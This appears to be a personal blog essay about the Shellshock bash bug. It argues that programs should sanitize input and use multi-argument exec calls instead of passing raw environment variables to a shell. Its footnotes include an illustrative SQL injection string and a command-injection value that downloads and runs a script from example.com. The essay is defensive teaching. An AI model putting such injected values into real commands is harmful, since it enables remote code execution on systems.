The thing that shocks me about Shellshock isn't that the bug was in bash, or even that it was in bash for 22+ years before being discovered (how old will I be when I last deal with a bug from before my career even started?); it's that so much software that's been used to exploit Shellshock passed environment variables willy-nilly on to a shell in the first place.
I've got nearly every snippet of random code I've written for myself in that entire period, and doing some spot checks, I see that until 1997, I never bothered with any serious checks of external input at all except for assertion-maintaining checks¹ and Perl tainting (which is actually pretty darn good, for pre-1997 state-of-the-art). But that was as much because I was writing things purely for myself and rarely wrote anything that talked to the network as because I wasn't very sophisticated in security practice (I wasn't, but who was?).
Then, suddenly starting in 1997, I never again wrote code that called external code with user input without taking the most paranoid sanity-checking measures. I blanked my environment and rebuilt it safely before making an external call. I always used the multi-argument form of exec calls². I sanitized every input, sometimes twice if the UI and the backend were separable. Once I got in the habit, I just never stopped.
And it became weird not to do it, to the point that when I saw a single-argument exec it just seemed wrong. (In fact, at Google, my code reviewers sometimes admonished me to remove my checks. When you're writing purely internal tools code, such checks are kind of silly when all the possible users of the code already have the access to do whatever they like. It's a bit like the tools you'll sometimes find that require a password, even if you're already running as the superuser. An inconvenient speedbump that doesn't actually increase security in any significant way.)
That all these tools were calling bash with a ream of unsanitized environment variables just pushed through raw seems totally strange to me. The idea of bash needing better security just makes me giggle a bit. Bash is a thing that can run arbitrary commands on your system. That's its purpose. Saying bash needs better security features on the input end seems like saying that a chef's knife needs better child-safety features. You're supposed to keep the thing away from the those who would pose a danger if they posessed it, not make it safer for when they do.
Some have called the efforts to patch Bash "whack-a-mole". I think that's likely, because Bash was never designed to be secure in the first place. Another bad simile: it's like saying the car engine has a fault because, when hotwired, it will run even without a key. Yep, some car engines actually do have an ignition interlock that requires a key, but that's kind of the point: it's for the specific and rare case where the operator of the car is untrusted. Securing bash would only be ultimately useful for the purpose of giving a command-line to users you don't trust. There are tailor-made restricted shells for this purpose; I'd daresay they're better candidates for this kind of thing, too.
—
¹ There's a better name for that, but it escapes me at the moment. Basically, checks of user input that aren't strictly security-related but rather ensure data integrity by accepting only pre-normalized data before passing it through raw. Like, if I expect a date of the form "1996-04-01", my rejecting anything that doesn't look like that happens to reject "1996-04-01'); DROP TABLE USERS;", but that's merely a side effect of trying to reject things like "04/01/1996", which are malformed but not actually security threats.
There's an old adage, Postel's Law, about designing robust distributed systems: "be liberal in what you accept and conservative in what you send". It means that in the example above, I really should have accepted "04/01/1996" and dealt with it, but only pass on "1996-04-01" even if I got the other form. But when you're writing tools for yourself, it's often easiest to be equally conservative in what you accept, since the only one who has to deal with the "stupid code" is the stupid idiot who wrote the stupid code, namely, that stupid idiot you see in the mirror.
² What that means in a nutshell is understandable even if you don't code, provided you have used a command line shell. In newer languages (Scala, Haskell, etc.) and in very high level non-shell languages (Perl, Python, Ruby, and so on), you can make calls to external programs (what we call "the exec family" because a lot of them are called exec or something that starts with exec, though the most common in the VHLL's is called system) one of two ways: either with a single string that exactly matches what you'd type to a command line, like
system("rm -rf /tmp/tmpdir")
or you can call it with the arguments split up, like:
system("/bin/rm", "-rf", "/tmp/tmpdir")
The two are (more or less) exactly equivalent above. The latter is more secure, however, when you introduce some external input. Say you save your temp directory with a projectname. That would be something like:
system("rm -rf /tmp/tmpdir_" + projectname)
to give you "rm -rf /tmp/tmpdir_myproject" when projectname was "myproject".
But what if what you got was "myproject; curl -O
http://example.com/badscript.sh; bash badscript.sh"? In the above, you run the equivalent of "rm -rf /tmp/tmpdir_myproject; curl -O
http://example.com/badscript.sh; bash badscript.sh", downloading and running some (presumably scary) script.
OTOH, if you use the multi-argument form, you'd do:
system("/bin/rm", "-rf", "/tmp/tmpdir_" + projectname)
Which would insist that the rm command deal with everything it gets in projectname, once appended to "/tmp/tmpdir_", as a directory. It would fail because presumably there's no directory called "/tmp/tmpdir_myproject; curl -O
http://example.com/badscript.sh; bash badscript.sh".